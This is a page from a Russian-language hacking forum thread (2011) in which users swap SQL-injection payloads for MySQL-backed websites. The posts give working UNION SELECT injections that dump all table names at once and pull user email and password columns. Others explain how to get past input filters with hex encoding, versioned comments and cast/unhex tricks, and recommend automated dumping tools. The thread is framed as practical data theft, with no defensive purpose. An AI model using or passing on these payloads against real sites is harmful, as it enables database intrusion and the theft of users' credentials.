HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1598 из 2422 « Первая < 5981098149815481588 1594 1595 1596 1597 1598 1599 1600 1601 1602 1608164816982098 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.02.2011, 01:12
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


По умолчанию
Спасибо. Но тогда возникает вопрос по проге.

В ней надо что бы заканчивался запрос на +limit+

Как это сделать со стандартной скулей?

UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
 
Ответить с цитированием

  #2  
Старый 07.02.2011, 01:23
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от Fooog  
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
тут просто даеш проге так:

pxxp://site.com/script.php?id=1 UNION SELECT 1,2,,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+

а в поле "Что нужно сдампить" ставиш TABLE_NAME

воббще если надо сначала тока табли слит быстро то вот так можно:

pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 --

выдает все табли разом в хексе
 
Ответить с цитированием

  #3  
Старый 07.02.2011, 01:51
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от YuNi|[c  
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
POST запросы поддерживаются в версии 2.0

Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась

https://rdot.org/forum/showthread.php?t=1142

Добавил версию 2.0 /showpost.php?p=2544529&postcount=10
 
Ответить с цитированием

  #4  
Старый 07.02.2011, 02:16
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от Redwood  
POST запросы поддерживаются в версии 2.0, просто я не обратил внимание какая версия выложена в топике, думал что она и есть, сейчас добавлю.
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась https://rdot.org/forum/showthread.php?t=1142
я не посмотрель что ты выложил, у меня уже был какой то версия.

Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы

тут даже попросил кодерам подсказать или наколбасит

пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки)

/showthread.php?p=2536279

остался без ответа там
 
Ответить с цитированием

  #5  
Старый 07.02.2011, 19:51
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
 
Ответить с цитированием

  #6  
Старый 07.02.2011, 20:07
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от Чакэ  
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
http://forum.antichat.net/thread104591.html

Вопрос №2
 
Ответить с цитированием

  #7  
Старый 07.02.2011, 20:16
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию
Цитата:
Сообщение от Чакэ  
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
да Redwood точно указал еще можно так:

unhex(Hex(cast(Version() as char)))

cast(Version()+as+binary)
 
Ответить с цитированием

  #8  
Старый 07.02.2011, 20:30
Чакэ
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728

Репутация: 62
По умолчанию
Redwood, очень благодарен cast(concat_ws(0x3a,version(),user(),database())+a s+binary) - true
 
Ответить с цитированием

  #9  
Старый 07.02.2011, 21:39
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию
Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ...

Все разобрался, это уникальный идентификатор присвоенный скриптом ...
 
Ответить с цитированием

  #10  
Старый 07.02.2011, 22:36
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


По умолчанию
Вот. Нашел на свой вопрос удобный ответ. Товарищ помог

group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)

Вдруг кому понадобиться.
 
Ответить с цитированием
Ответ
Страница 1598 из 2422 « Первая < 5981098149815481588 1594 1595 1596 1597 1598 1599 1600 1601 1602 1608164816982098 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.